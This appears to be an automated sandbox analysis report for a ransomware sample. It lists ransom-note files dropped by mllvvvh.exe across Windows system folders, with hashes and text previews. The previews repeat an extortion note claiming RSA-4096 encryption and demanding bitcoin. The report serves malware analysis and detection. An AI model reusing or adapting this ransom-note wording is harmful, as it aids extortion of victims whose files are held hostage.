                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\Java\installcache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Oracle\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Package Cache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.png
